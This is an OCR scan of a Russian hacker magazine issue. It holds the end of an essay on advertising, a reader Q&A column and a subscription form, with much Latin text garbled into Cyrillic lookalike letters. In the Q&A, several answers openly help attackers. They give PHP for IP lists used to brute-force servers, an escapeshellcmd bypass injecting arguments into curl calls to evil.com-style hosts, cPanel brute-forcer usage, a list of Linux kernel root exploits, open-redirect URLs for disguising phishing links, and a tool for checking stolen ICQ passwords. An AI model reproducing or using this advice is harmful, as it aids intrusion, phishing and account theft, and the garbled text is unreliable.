прочно стоящий на ногах (даже если он вылетел с работы 
и по уши в долгах). Аналогичным образом дело обстоит и с 
предметами искусства, в которых реально никто ничего не 
понимает и подделку от подлинника отличает только при 
помощи толпы наемных экспертов. 

Фактически, мы покупаем не реальную вещь, а объект 
сознания. Только в сознании подлинник отличается от ко- 
пии на сумму с шестью нулями и двумя цифрами спереди. 
Только в сознании существуют понятия «бренд», «на- 
дежность», «безопасность». А где эти бренды в реальной 
жизни? Статистика отказов радиоаппаратуры наглядно 
убеждает нас в том, что бренды выходят из строя косяка- 
ми. Качество монтажа на уровне подпольных китайских 
производителей, схемотехнические решения кишат 
ошибками... Но потребителей это не смущает. Если бы 
дело было в незнании... Так ведь они горло готовы пере- 
грызть за любимый бренд — тот самый, который ставитих 
раком и думает лишь о себе и своей прибыли. 



Лояльность кбрендам — любопытный психологический фе- 
номен, объяснить который пытались многие, но... увы! Жизнь 
сложнее и многограннее заумныхтеорий. Битвы Іпіеіѵз АМБ, 
ѴѴіпсІоѵѵзѵз Ыпих, Сапоп ѵз N ікоп многого стоят. Причем, как в 
прямом, таки в переносном смысле. Рациональное мышле- 
ние здесь отдыхает. Если человекскептически настроен про- 
тив продукции конкурентов, он найдет кучу причин, почему 
она хуже. Тут даже никакой рекламы не надо! 

Именно так и работает настоящий маркетинг, основанный 
на продаже объектов сознания, а в сознание он проникает 
настолько глубоко, что мы его практически не замечаем. 

И обманывает нас в этом случае отнюдь не реклама, а мы 
сами. Самообман — штука коварная. Казалось бы, не так 
ужтрудно включать рациональное мышление при каждой 
покупке, задумываясь: а что именно мы покупаем? И что 
предлагают конкуренты? Только не надо говорить: «тачка, 
конечно, хороша, воттолько ездить на ней совсем бес- 
понтово, если не сказать — стыдно». Стыдно оно как раз 
для тех, кто вынужден кидать понты, изображая Моську, 
лающую на Слона. Самого же Слона все эти разборки 
ничуть не волнуют, и необходимости самоутверждаться в 
жизни у него нет. 

г ПО МИННОМУ ПОЛЮ НАУГАД 

Вторжение рекламы в информационное пространство 
нашего сознания не проходит да ром. Так, например, до 
недавнего времени все яркое, красное и мигающее немед- 
ленно привлекало наше внимание, подчиняясь древним 
инстинктам, ставшим жертвами рекламы. Впрочем, чело- 
век— существо адаптивное и ко всему привыкающее. Пос- 
ледние эксперименты показывают, что если расположить 
на ѴѴЕВ-страничке огромную красную мигающую надпись 
«ВХОД», то заметить ее будет сложнее, чем мелкую, серую и 
немигающую. Почему? Да потому, что все большое и мигаю- 
щее автоматически отфильтровывается подсознанием как 
мусор, не несущий никакой полезной информации. 

С одной стороны это, конечно, хорошо (реклама идет 
лесом), а с другой... сигналы опасности широко исполь- 
зуются в быту и на производстве. Взять хотя бы те же 
стоп-огни. Кому из сидящих за рулем хочется их фильт- 
ровать на уровне подсознания? Но, увы, подсознание 
не в состоянии отличить критически важные сигналы от 
рекламной шушеры, что создает прямую угрозу для жизни, 
увеличивая количество аварий. Так что реклама намного 
более вредоносна, чем это принято считать. 
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Эволюциятелеви- 
зионной рекламы 
подробно описана 
Пелевиным в «Поко- 
лении П», и хотя сами 
рекламисты воспри- 
н и мают этот роман как 
гнусный поклеп — это 
луч шее доказательст- 
во правоты Пелевина. 
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Один из победителей рекламного фестиваля І_опсІоп Іпіегпабопаі 
Аѵ\ 



Реклама замка для велосипеда 

какие они есть, за вычетом их показной крутизны и торговых марок? 
Как ни парадоксально, но чтобы избавиться от рекламной зависимос- 
ти, необходимо перестать игнорировать примелькавшуюся рекламу и 
втыкать в нее со всей серьезностью и вниманием. 

До тех пор, пока реклама скользит по ушам, не попадая в сознание, 
основным объектом воздействия будет оставаться подсознание, 
ответственное за иррациональное желание купить совершенно 
ненужную нам вещь. И только подвергнув рекламу сознательному 
анализу, мы подавим все иррациональные желания в зародыше, 
потому как фуфла нам не нужно. Мы не лохи. То есть, это мы думаем, 
что не лохи. В действительности, могучая сила искусства позво- 
ляет сфотографировать ведро помоев так, что слюнки будут капать 
независимо от то го — знаем ли мы, что это помои, или нет. Увы, со- 
знание и подсознание не имеют между собой прямых мостов. Умом 
мы понимаем, что помои и есть помои, как их ни фотографируй. Но 
подсознанию, оперирующему образами, этого не объяснишь. Все, 
что выглядит аппетитным, пробуждает естественный инстинкт, 
особенно если мы голодны. 

И тут мы встаем на оченьзыбкую почву — сумеречную зону, где 
подсознание уже заканчивается, а сознательное мышление еще не 
начинается, а потому лучше не заморачиваться этими вопросами, а 
жить, наслаждаясь каждой секундой. В конце концов, деньги для того 
и существуют, чтобы ихтратить, в том числе и на разводы, которых все 
равно не избежать, ибо в рекламном бизнесе работаюточень неглу- 
пые люди, положившие десятки лет, чтобы обхитрить таких, как мы. 
Техника обмана непрерывно совершенствуется. Отбрасываются одни 
решения (как полностью выработанная золотая жила], но на смену им 
приходят другие — намного более изощренные, т 



Чтобы рассказать, насколько длинной стала шоколадка Зпіскегз 2раск, 
агентство ТЬе Аззізіапі показало молодого человека, который целиком 
засунул ее себе в рот ' 
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К тому же, реклама изменяет привычную схему интерпретации всего 
увиденного или прочитанного. Пример изжизни. В Малайзийской 
столице Куала Лумпур при выходе со станции КІ_ Бепігаі (Мопогаіі) 
виситобъявление «ваша следующая остановка в ста метрах ровно пе- 
ред вами». В смысле, пройди сто метров и пересядь на другой поезд, 
который довезет тебя до аэропорта или в любом другом направлении. 
Казалось бы, что тут непонятного? Так ведь нет. Народ ходит кругами в 
поисках вокзала и только потом соображает, что то была не реклама, и 
что вокзал расположен аккурат в ста метрах по прямой. 

Вопрос: почему большинство пассажиров интерпретируютобозна- 
ченный текст как рекламу (типа в ста метрах — магазин), хотя никаких 
явных признаков рекламы нет? Ответ — это срабатывает адаптивный 
фильтр нашего подсознания, в памяти которого всплывают похожие 
рекламные плакаты, и тутже выставляется ментальный блок. Как 
следствие — мы экономим «процессорное время» на анализе реклам- 
ных слоганов, попадая в глупые ситуации, когда реклама оказывается 
вовсе не рекламой, а действительно полез ной информацией. 

Кстати, продемонстрировать особенность ментальных фильтров позволя- 
ет следующий нехитрый эксперимент. Берем испытуемого (одна штука или 
целый кворум], пачкутрешек (не важно, в какой валюте] и предупреждаем, 
что сейчас мы всех обсчитаем, как пионеров, советуя пристально следить 
за нашими пальцами и всеми махинациями. Выдергиваем из пачки треш- 
ку и бросаем на стол. Спрашиваем: «Три?». Народ, ожидающий подвоха, 
видит: действительно, три, что хором и подтверждает. Ну, а мы тем време- 
нем продолжаем: четыре, пять... Естественно, это нужно не описывать, а 
показывать, но парытрояков испытуемый по-любому недосчитается. 

Весь фокус в том, что при быстрой смене контекстов («три» — это три 
рубля, а «четыре» — количество отсчитанных купюр) все выглядит 
очень естественно. Три — это действительнотри, а за ним идет четыре. 
Мы же предупредили — следить за ловкостью рук, а неверный выбор 
фокуса внимания дает нам полный оперативный простор для всевоз- 
можных махинаций. 

Аналогичная техника используется и в рекламе. Подвох оказывается 
совсем нетам, где мы его ожидаем. Изначально настраиваясь на 
обман, мы (образно выражаясь] следим за руками, чтобы неожиданно 
не достали туза, спрятанного в рукаве, и не затащили купюру между 
пальцами. Но подобными вещами реклама не занимается, и в целом 
ей можно верить. А вот при переходе от целого к частностям обнару- 
живается куча мелких и крупных нестыковок, которых среднестатисти- 
ческий обыватель все равно незамечает. Что ж, тем хуже для него. 

г НЕСКОЛЬКО СОВЕТОВ НАПОСЛЕДОК 

Как избежать развода и соскочить с рекламной иглы? Как посмотреть 
на мир незамутненным взглядом, чтобы видеть предметы такими, 
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0: Занимаюсь брутом дедиков. Нужно 
сгенерировать список ІР-адресов для брута 
по определенному диапазону. Как это 
сделать? 

А: С поставленной тобой задачей легко спра- 
вятся следующие несколько строк рбр-кода: 

<?р]тр $ір_зСагС= '127.0.0.1' ; / /на- 
чальный ір диапазона 
$ір_епс!= '127.0.1.3'; / /конечный ір 
диапазона 



$ір_зСагС = ір21опд ( $ір_зСагС ) ; 
$ір_епс! = ір2 Іопд ( $ір_епс!) ; 
іог ( $і=$ір_зСагС ; 

$і< ( $ір_епсЗ+1) ; $і + +) 

{ 

ргіпС 1опд2ір($і) . "\п"; 

} 

?> 

После запуска скрипт выведет в окно браузера 
все ІР из заданного диапазона. 



0:Как обойти рНр-функцию сарезЬеІІстсШ, 
с помощью которой кодеры предотвраща- 
ют выполнение команд на сервере? 

А: В рбр существует множество специфических 
функций, предназначенных для выполнения 
внешних приложений и команд: ехес ( ) , 
раззСЬгиО, зузСеш() и т.д. Для защиты от 
внедрения в них постороннего кода чаще всего 
используются функции езсарезііеііагд ( ) 
и езсарезЬеІІстсі (). Функция 
езсарезЬеІІсшсі ( ) похожа на свою коллегу 



► ізб 
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с тем исключением, что при «зачистке» будут 
деактивированы с помощью обратного слэша 
символы, имеющие специфическое значение 
для операционной системы: 

#&; ' I *?~<> Л ()[]{} $ \ , а также симво- 
лы \хОА и \хЕЕ 

Также, в отличие от езсарезкеііагд ( ) , эта 
функция не будет как-то особенно обрабаты- 
вать строки с пробелами и заключать строку 
аргументов в кавычки. Например, если мы при- 
меним езсарезкеіістсі ( ) для такой строки: 

$зігіпд = "Чтеііо, могісі! ' ; ісі" ; 

а затем выполним получившуюся строку 
(«\ 1 Ь.е11о , ѵюг1с[\ 1 \ ; ісЗ.»] в функции 
зузСеш ( ) , то успешно увидим вывод на экран 
команды ісі :-). В данном примере интер- 
претатор воспринимает нашу строку какдва 
аргумента: «\ 1 Ъеііо» и «ѵгог1<ЭЛ 1 \ $ ісі» 
соответственно. Еще одна особенность 
езсарезііеіісшсі ( ) заключается в том, что 
кавычки ‘ и » экранируются слэшами только, 
если они не находятся в паре. То есть, если 
получится передать в качестве аргумента две 
двойные или одинарные кавычки, то можно 
будет вставить еще один аргумент для теку- 
щей команды, например: 

$_8ЕКѴЕК [ ' НТТР_Н8ЕК_АСЕ]МТ ' ] = ' Орега " 
-Н "Нозі: еѵіі.сош'; 
зузіет ( ' /изг/1оса1/Ъіп/сиг1 -к -Н 
"Ьзег-Адепі : 

1 . езсарезкеіісшсі ( $_8ЕКѴЕК [ ' НТТР_ 
ІІ8ЕК_АСЕ]МТ 1 ] ) . 1 " -ш 2 
"Ьіір : //Ь4ск. сот" 1 ) I 

Другую команду выполнить таким способом, к 
сожалению, не получится. 

О: Как домайнеры находят и регистрируют 
проэкспайренные домены? 

А: Сервисов, предоставляющих подобную 
информацию, существует вел и кое множество. 
Один из них — ѵѵѵѵѵ.ѵгіооіз.сот . 

Зайдя на сайт, ты увидишь слева в колонке 
списки дат, когда проэкспайрились домены. 
Нажав на выбранную дату, ты получишь отсор- 
тированный по длине список доменов, дата 
регистрации которых истекла. К примеру, вот 
часть четырехбуквенников, за которые забыли 
проплатить до 2 мая 2008 года: 

сізд. сот 
сдіо . сот 
смду . сот 
сгіі . сот 
сЩФг, сот 
сітда . сот 



сіхіѵп сот 
ег з з . сот 
езха . сот 
іуаі . сот 
дхеі . сот 
дхгі . сот 
ІО 2 у . сот 

В списках могут попадаться довольно-таки 
неплохие домены, такчто незевай! 

0: Есть ли асечный клиент под КПК, с кото- 
рым можно работать без стилуса? 

А: Такой клиент действительно есть. Это 
известный и при этом бесплатный РІОЕОІЧ. Из 
описания программы: 

« Р I Ѳ Е О N ! — ІСО-клиент, это удобная и 
красивая программа, разработанная для 
комфортного общения во время работы с 
КПК. Отличительной особенностью является 
современный интерфейс, ориентированный на 
работу без стилуса, только нажатием пальцами. 
Работает без установки на всех РоскеіРС-ус- 
тройствах под ОС ѴѴМ2003, ѴѴМ5, ѴѴМ6, ѴѴМ6.1, 
ЭтагфЬопез». 

Особенности: 

• Управление пальцами, без стилуса; 

• Поддержка цОѴОА, ѴОА, ОѴОА, ѴѴѴОА-экранов; 

• Поддержка РРОХУ 50СК5 4/5, НТТР; 

• Поддержка анимированных смайл -па ков 
Мігапсіа & 01 Р; 

• Поддержка нестандартных паролей в НЕХ- 
виде. В пароле писать Ьех: и 16-тиричные 
символы без пробелов; 

• Поддержка хардварной клавиатуры; 

• Возможность писать с нескольких номеров 
ІСО. 

Скачать клиент можно на официальном сайте 

— ріаеоп.ѵрго.ги . 

0: Как брутить пароли к СРапеІ на хостинге? 

А: В этом тебе поможет СрапеІ Раззѵѵогсі Вшіе 
Рогсег, написанный на Регі неким Неззат-х. 
Скрипт основан на баге, обнаруженном Ноззеіп 
Азааг [ 5і тога Ь-еѵ. сот ): «Іп срапеІ СЬеск 
Раззѵгогсіз тііі Неасіегз апсі аііаскегз сап 
Вгиіе Рогсе тіЬ. Ьазе54 аиікепіісаііоп». 
Сам скриптможно скачать на официаль- 
ном блоге Неззат-х (также доступен и 
рбр-исходник] — бКрУ/беззатх.ѵѵогбргезз. 
сот/2007/03/21/срапеІ-ЬгиЫогсе-ргоЫетз . 
Использование брутера весьма простое. Из 
командной строки запускай скрипт следую- 
щим образом: срапеІ .рі [НОЗТ] [ІІзег] 
[РОКТ] [Іізі] . Тут [НОЗТ] —домен, где 
расположена СРапеІ, [Изег] — юзердля 
брута, [РОКТ] — порт СРапеІ (по дефолту 2082), 
[Іізі] — списокпаролей. 

О: Какие вообще существуют ядерные 
сплойты под Ыпих? Где их скачать? 




А: Вот практически полный списокядерных 
сплойтов для веток2.2, 2.4 и 2.6: 

• Ьіпих 2.2.x ->Ьіпих кегпеі рігасе/ 
ктосі Іосаі гооі ехріоіі (кіір:// 
тіІмОгт. сот/ехрІоііз/З ) ; 

• Ьіпих 2.2.x (оп ехрогіесі іііез, 
зіюиісі Ье ѵиіп) (кіір : / /тіІмОгт. 
сот/ехрІоііз/718 ) ; 

• Ьіпих <= 2.2.25 ->Ьіпих Кегпеі 2 . х 
тгетар тіззіпд сіо_типтар Ехріоіі 
(Ніір: //тіІмОгт. сот/ехрІоііз/160 ) ; 

• Ьіпих 2.4.x ->Ьіпих кегпеі рігасе/ 
ктосі Іосаі гооі ехріоіі (ІШір:, 
тіІѵ^Огт. сот/ехр1оііз/3 ) ; 

• Ьіпих 2.4.x -> рѵтесі . с — Ьіпих 

2 . 4 апсі 2 . б зуз_изе1іЬ Іосаі гооі 
ехріоіі (Ьіір : / /тіІѵѵОгт. сот/ 
ехрІоііз/895) ; 

• Ьіпих 2.4.x ->Ьіпих кегпеі 2 . 4 
изеІіЬО ргіѵііеде еіеѵаііоп ехріоіі 
(Ніір : / /тіІмОгт. сот/ехрІоііз/778 ) ; 

• Ьіпих 2.4.2 0 ->Ьіпих Кегпеі Мосіиіе 
Ьоасіег Ьосаі КООі Ехріоіі (Ьіір:// 
тіІмОгт. сот/ехр1оііз/12 ) ; 

• Ьіпих <= 2.4.22 ->Ьіпих Кегпеі <= 
2.4.22 (сіо_Ьгк) Ьосаі Кооі Ехріоіі 
(Ніір: //тіІхѵОгт. сот/ехріоііз/ 13 1 ) ; 

• Ьіпих 2.4.22 ->Ьіпих Кегпеі 2.4.22 
"сіо_Ьгк() " Іосаі Кооі Ехріоіі (РоС) 
(Ніір: //тіІѵѵОгт. сот/ехріоііз/ 12 9 ) ; 

• Ьіпих <= 2.4.24 ->Ьіпих Кегпеі 2 . х 
тгетар тіззіпд сіо_типтар Ехріоіі 
(Ніір : //тіІѵЩгт. сот/ехріоііз/ 1 60 ) ; 

• Ьіпих 2.4.x <2. 4. 27- гсЗ (оп піз 
ехрогіесі іііез) (Ьіір : / /тіІмОгт . 
сот/ехрІоііз/718) ; 

• Ьіпих <= 2.6.2 ->Ьіпих Кегпеі 2 . х 
тгетар тіззіпд сіо_типтар Ехріоіі 
(Ніір: //тіІмОгт. сот/ехріоііз/ 1 60 ) ; 

• Ьіпих 2.6.11 -> Ьіпих Кегпеі <= 
2.6.11 (СРЬ 0) Ьосаі Кооі Ехріоіі 
(к-гасіЗ.с) (Ніір : / /тіІѵЩгт. сот/ 
ехрІоііз/1397 ) ; 

• Ьіпих 2.6.13 <= 2.6.17.4 -> Ьіпих 
Кегпеі 2.6.13 <= 2.6.17.4 ргсіі ( ) 

• Ьосаі Кооі Ехріоіі (Іодгоіаіе) 
(Ніір: //тіІмОгт. сот/ехріоііз /2 031) ; 

• Ьіпих 2.6.13 <= 2.6.17.4 -> Ьіпих 
Кегпеі 2.6.13 <= 2.6.17.4 зуз_ 
ргсіі () Ьосаі Кооі Ехріоіі (кіір:/ 
тіІѵЩгт. сот/ехрІоііз/2011) ; 

• Ьіпих 2.6.11 <= 2.6.17.4 - 

> ЬООІузНіі . с -Ьіпих Кегпеі <= 

2.6.17.4 (ргос) Ьосаі Кооі Ехріоіі 
(Ьіір: //тіІѵ^Огт. сот/ехрІоііз/2013 ) ; 

• Ьіпих 2.6.x < 2.6.7-гсЗ (сіеіаиіі 
сопіідигаііоп) (кіір : / /тіІшОгт . сот/ 
ехрІоііз/718) ; 

• Ьіпих 2.6.x -> рѵ7пес! . с — Ьіпих 

2 . 4 апсі 2 . 6 зуз_изе1іЬ Іосаі гооі 
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ехріоіі (кіір : / /тіІѵЩгт. сот/ 
ехрІоікз/895 ) ; 

• Ьіпих Кегпеі < 2.6.22 ШгипсаСе ( ) / 
ореп ( ) Ьосаі Ехріоіі (ЪЬЬр:// 
тіІмОгт. сот/ехріоііз/ 6851 ) ; 

• Ыпих Кегпеі 2.6.23 — 2.6.24 
ѵтзріісе Ьосаі КооЬ ЕхрІоіЬ (Шр:/ 
тіІмОгт. сот/ехріоііз/ 5093 ) ; 

• Ыпих Кегпеі 2.6.17 — 2.6.24.1 
ѵтзріісе Ьосаі КооЬ ЕхрІоіЬ (ЫЬр:// 
тіІмОгт. сот/ехріоііз/ 5092 ) . 

Также хочу посоветовать тебе списокэкс- 
плойтов под конкретные оси и сервисы на 
них — ЬНрУ/іпбоипсІегдгоипсІ.ѵѵогсІргезз. 
соітѴ2008/06/14/а-пісе-[І5ЫЫоо1:-ехр1.оіІ:5- 
апсІ-ѵѵогкіпд-ІіпкБ . 

0: Как можно зашифровать фейковую 
ссылку, например, в мыле? 

А: Большинство спамеров и хеккеров шифруют 
свои ссылки с помощью редиректов, располо- 
женных на трастовых сайтах. Сейчас в паблике 
известны следующие редиректы: 

• ЬіЬЬр : //уапсіех. ги/гебіг?бЬуре= 
тагкеЬ&иіб=854942812168473879&с 
аЬедіб=62 8&ргісе=7247&ехЬ=&Ъ.уре 
г_іб= <Щіурег_саЬ_і б= 90711 &рр = 7 & 
ср=10&сЪ=10&ср_аЪ=0&ае=1&зЬ.ор_ 
іб=6434&роі=&иг1=ЪЫ:р : //твой_еѵі1 . 
сайт; 

• ЬіЬЬр : //до .шаіі . ги/ 
с1іск?иг1=ЫіЬр : / /твой_еѵі1 . сайт; 

• ТШЬр : / / г .шаіі . ги/с1Ы234/г .шаіі . 
ги/с1Ы234/г.шаі1.ги/с1Ы23 4/ 

г .шаіі . ги/с1Ы23 4/ЬЬЬр : //твой_ 
еѵіі . сайт; 

Также посоветовал бы кодировать твою ссылку 
в игіепсобе с помощью сервиса ЫірУ/Ьаск- 
збор.огд.гиЛооІг-собе-епсобе . 

Р.5. А чтобы у юзера не появлялисьсообщения 
о переходе на другой сайт (если в его мылбоксе 
включен Ыппі, конечно], можно дописать в 
теге ссылки параметр ЬагдеЬ=_зе1і или 
ЬагдеЬ=_Ыапк. 

0: Вручу аськи. Какузнать, насколько экс- 
клюзивны пароли в моих пасс-листах? 

А: Недавно на асечке ( ЬбрУЛогит.азесЬка. 
ги/зЬоѵѵШгеасІ.рЬр?1=1 07702 ) появилась про- 
грамма ЕхсІизіѵеРазз за авторством ЫетеЫ, 
с помощью которой ты сможешь проверить на 
уникальность свои пароли. Вот что сам автор 
программы пишет о ней: 

Мной была написана данная программа 
для ускорения поиска вашего пароля в 
имеющихся базах Асечки и Грабберз . 
Все они собраны вместе в удобной фор- 
ме. А это — порядка 2500 постов. 
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Использование — должно быть ин- 
туитивно понятно . Вводим пароль 
— получаем все посты, в которых он 
содержится. Отображается дата пос- 
та, полный линк на оригинал (клика- 
бельный) + собственно сообщение, в 
котором жирным красным шрифтом выде- 
ляется искомый текст . 

Внимание: поиск чувствителен к ре- 
гистру, но это логично, так как па- 
роль и ПаРоЛь — это разные пароли) . 

0: Хочу установить 5куре на свой мобиль- 
ный телефон! Это реально? 

А: Вполне, только не рассчитывай на то, что 
удастся осуществлять звонки по СРВ5. Скорее 
всего, ничего хорошего не выйдет и в случае 
использовании отечественного ЕОСЕ, кото- 
рый, хотя и может похвастаться чуть большей 
полосой пропускания, нотакже отличается вы- 
сокими задержками. Впрочем, расстраиваться 
из-за этого не стоит: тарифы с безлимитным 
трафиком (а иначе смысл звонить через I Р?) 
по-прежнему практически не распространены. 
Совсем другое дело, если твой телефон под- 
держивает ѴѴІ-Еі, а рядом есть точка доступа. 
Звони, сколько влезет. Для ѴѴіпбоѵѵз МоЬіІе есть 
специально подготовленная версия от самих 
разработчиков Зкуре, а для обычныхтелефонов 
с 9аѵа и смартфонов на базе ЗутЬіап легко 
инсталлится прога ітіпд ( ѵѵѵѵѵѵ.ітіпд.сопп ]. В 
случае поездокза границу, где ѴѴі-Еі повсюду, 
подобными приблудами можно сэкономить не 
одну сотню долларов на счету. 

0: Есть ли возможность перенаправить 
пользователя с моей ^-страницы на дру- 
гой сайт? 

А: Для бесплатного аккаунта это невозможно, а 
вот пользователи с платными учетными запи- 
сями мо гут до ба вить теги редиректа, восполь- 
зовавшись редактором НТМЕ-шаблонов. 

0: По долгу службы я обслуживаю большой 
и самый разнообразный парк машин. К 
сожалению, не имею возможность везде 
установить одну и ту же программу для уда- 
ленного управления, поэтому приходится 
использовать клиент и для КРО, и для ѴЫС, 
и тот же РиТТѴ для 55Н-сессий. Возможно, 
есть более универсальное решение, поз- 
воляющее коннектиться к самым разным 
системам? 

А: На одном из наших недавних дисков мель- 
кал инструмент, точь-в-точь подходящий по 
требованиям. До сих пор являясь бесплатной 
тРетоІе [ ѵѵѵѵѵѵ.тгетоіе.огд/ѵѵікі ]. он позволя- 
етобращаться кудаленным системам по самым 
разным протоколам РБР (Ветоію Безкіюр), ѴІЧС 
(Ѵігіиаі ІЧеЬл/огк Сотрибпд], ІСА (Іпберепбепі; 
Сотрибпд Агсбііесіиге], 55Н (Зесиге ЗЬеЩ, 
Теіпеі (ТЕБесоттипісабоп N ЕТѵѵогк] , НТТР/5 




(НурегІюхіТгапзіюг Ргоіосоі) , Ріодіп (Ріодіп), 
РАѴѴ. Каждое соединение — в отдельной вклад- 
ке, что вдвойнеудобно! 

0: Я создал в ІІЬипІи нового пользователя, 
но тот не может пользоваться командой 
зисіо. Почему? Как исправить? 

А: Чтобы оградить пользователей от частой 
ошибки, когда работа с самого начала и посто- 
янно ведется под аккаунтом администратора 
(что, естественно, очень плохо], разработчики 
дистрибутива намеренно отключили гооі: аккаунт. 
Всеадминистративныезадачи выполняются че- 
рез команду зибо. Напомню, что команда зибо 
предоставляет возможность выполнять команды 
либоотимени гооЕ либо других пользователей. В 
Ббипіи поумолчанию использование зисіо раз- 
решенотолько первому пользователю, однако это 
легко можно исправить. Правила, используемые 
зисіо для принятия решения о предоставлении 
доступа, находятся в файле /еЬс/зибоегз. 
Простейшая конфигурация выглядиттак: 

БеіаиІЬз епѵ_гезеЬ 
гооі АЬЬ= (АЬЬ) АЬЬ 
изег АЬЬ= (АЬЬ) АЬЬ 

Такая конфигурация дает пользователю изег 
все права пользователя гооі: при выполнении 
команды зибо. Обрати внимание на директиву 
БеТаиШз епѵ_гезеЬ: она полностью запре- 
щаетвсе пользовательские переменные при 
исполнении команд отимени гооі. Повышая 
уровень безопасности, это одновременно 
может привести к некоторым проблемам и 
несовместимостям. Поэтому использование 
личных переменных можно разрешить, напри- 
мер, какой-то конкретной группе или отдельно- 
му пользователю, добавив следующую строку в 
конфиг: «БеТаиШз : %абтіп ! епѵ_гезеЬ». В 
этом случае для пользователей группы абтіп 
переменные окружения будут разрешены. 

0: Как проще всего звонить в Москву и 
Питер бесплатно? 

А: К сожалению, мировые гиганты ѴоІР не 
спешат предоставлять безлимитные планы и 
бесплатные звонки по России. Однакоу мест- 
ных операторов та кая возможность есть. Я го- 
ворю о зщпеЕт, а также некоторых известных 
интернет-провайдерах, которые помимо всего 
прочего предоставляютуслуги ІР-телефонии 
на основе технологи и 5ІР. Для использования 
придется установить специальную программу 
или же приобрести 5ІР-роутер. В качестве 
программного средства могу порекомендо- 
вать утилиту Х-Бііе. При минимуме настроек, 
которые в большинстве случаев сводятся к 
простому вводу логина и пароля, она позволяет 
уже через несколько минут после установки 
осуществлять звонки на городскиетелефоны 
Москвы и Питера абсолютно бесплатно. ИИ 



► 138 
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ГОДОВАЯ ПОДПИСКА ПО ЦЕН 

91 ЛП (на 1 5% дешевле чем 

м I Ѵѵ Ь#у %#и при покупке в розницу) 



Единая цена по всей России. Доставка за счет издателя, в том числе курьером 
по Москве в пределах МКАД 

Для жителей Москвы (в пределах МКАД) доставка может осуществляться бес- 
платно с курьером «из рук в руки» в течение 3-х рабочих дней с момента выхода 
номера на адрес офиса или на домашний адрес. 



ПЛЮС ПОДАРОК 
ОДИН ЖУРНАЛ 
ДРУГОЙ ТЕМАТИКИ 




ЦѴОХрегІ 




ОФОРМИВ ГОДОВУЮ ПОДПИСКУ В РЕДАКЦИИ, ВЫ МОЖЕТЕ 
БЕСПЛАТНО ПОЛУЧИТЬ ОДИН СВЕЖИЙ НОМЕР ЛЮБОГО 
ЖУРНАЛА, ИЗДАВАЕМОГО КОМПАНИЕЙ «ГЕЙМ ЛЭНД»: 

• ЯНВАРСКИЙ НОМЕР - ПОДПИСАВШИСЬ ДО 30 НОЯБРЯ, 

• ФЕВРАЛЬСКИЙ НОМЕР - ПОДПИСАВШИСЬ ДО 31 ДЕКАБРЯ. 

• МАРТОВСКИЙ НОМЕР - ПОДПИСАВШИСЬ ДО 31 ЯНВАРЯ 



ВПИШИТЕ В КУПОН НАЗВАНИЕ ВЫБРАННОГО ВАМИ ЖУР- 
НАЛА, ЧТОБЫ ЗАКАЗАТЬ ПОДАРОЧНЫЙ НОМЕР. 







швт 



тмЕвыч 






«ІТ спец» 



Махі Іипіпд 



«Мобильные компьютеры» «Свой бизнес» 



«Лучшие Цифровые камеры» 



ВНИМАНИЕ! ВТОРОЕ СПЕЦПРЕДЛОЖЕНИЕ! 



ЗА 12 МЕСЯЦЕВ 




ЗА 6 МЕСЯЦЕВ 

При подписке на комплект журналов 

ЖЕЛЕЗОМ + ХАКЕР йѴО + ІТ СПЕЦ СО: 

- Один номер всего за 155 рублей 
(на 25% дешевле, чем в розницу) 

















КРАСИВЫЙ ЗАХВАТ ТЫСЯЧИ ІЛМ'ОВ С ТМТ.СОМ 





I 





ВЫГОДА • ГАРАНТИЯ • СЕРВИС 



КАК ОФОРМИТЬ ЗАКАЗ ВНИМАНИЕ! 



1. Разборчиво заполните подписной купон и квитанцию, выре- 
зав их из журнала, сделав ксерокопию или распечатав с 
сайта шѵѵ.дІс.ги. 

2. Оплатите подписку через Сбербанк . 

3. Вышлите в редакцию копию подписных документов — купо- 
на и квитанции —любым из нижеперечисленных способов: 

• по электронной почте 5иЬзсгіЬе@дІс.ги; 

• по факсу 8 (495) 780-88-24; 

• по адресу 1 1 9021 , Москва, 

ул. Тимура Фрунзе, д. 11, стр. 44, 

ООО «Гейм Лэнд», отдел подписки. 



Подписка оформляется в день обработки 
купона и квитанции в редакции: 

• в течение пяти рабочих дней после отправки подписных доку- 
ментов в редакцию по факсу или электронной почте; 

• в течение 20 рабочих дней после отправки подпис 
ных документов по почтовому адресу редакции. 

Рекомендуем использовать факс или электронную почту, в 
последнем случае предварительно отсканировав или сфотогра- 
фировав документы. 

Подписка оформляется с номера, выходящего через один 
календарный месяц после оплаты. Например, если вы произ- 
водите оплату в ноябре, то журнал будете получать с января. 



Подписка на журнал «ХАКЕР+РѴО» на 6 месяцев стоит 1200 руб. Подарочные журналы при этом не высылаются 



По всем вопросам 



связанным с подпиской, звоните по бесплатным телефонам 8(495)780-88-29 (для москвичей) 
и 8(800)200-3-999 (для жителей других регионов России, абонентов сетей МТС, БиЛайн и Мегафон). Вопросы 
о подписке можно также направлять по адресу іп1о@дІс.ш или прояснить на сайте ѵѵѵм.СІ_С.ги 



ПОДПИСНОЙ КУПОН 

ПРОШУ ОФОРМИТЬ ПОДПИСКУ НА ЖУРНАЛ «ХАКЕР» 



ПОДПИСНОЙ КУПОН 

ПРОШУ ОФОРМИТЬ ПОДПИСКУ 

НА ЖУРНАЛ « » 

□ на 6 месяцев 

□ на 12 месяцев 

начиная с 200 г. 

і— I I Доставлять журнал по почте 
*— 1 на домашний адрес 
Доставлять журнал курьером : 

□ на адрес офиса* 

□ на домашний адрес** 

(отметь квадрат выбранного варианта подписки) 

Прошу выслать бесплатный номер журнала 



Ф.И.О. 



АДРЕС ДОСТАВКИ: 

индекс 

область/край 

город 

улица 

дом корпус 

квартира/офис 

телефон ( ) 

код 

е-таіі 

сумма оплаты 

*в свободном поле укажи название фирмы 
и другую необходимую информацию 
**в свободном поле укажи другую необходимую информацию 
и альтернативный вариант доставки в случае отсутствия дома 

свободное поле 



Извещение 



ИНН 7729410015 ООО «Гейм Лэнд» 

АБ «ОРГРЭСБАНК», г. Москва 

р/с № 40702810509000132297 



к/с № 30101810900000000990 



БИК 044583990 




КПП 770401001 


Плательщик 


Адрес (с индексом) 


Назначение платежа 
Оплата журнала « 


» 


Сумма 


с 


200 г. 





Кассир 



Ф.И.О. 

Подпись плательщика 



Квитанция 



ИНН 7729410015 



ООО «Гейм Лэнд» 



АБ «ОРГРЭСБАНК», г. Москва 
р/с № 40702810509000132297 



к/с № 30101810900000000990 



БИК 044583990 




КПП 770401001 


Плательщик 


Адрес (с индексом) 


Назначение платежа 
Оплата журнала « 


» 


Сумма 


с 


200 г. 





Кассир 



Ф.И.О. 



Подпись плательщика 




) 



ипі*5 






гшп 

РУ22І.Е 



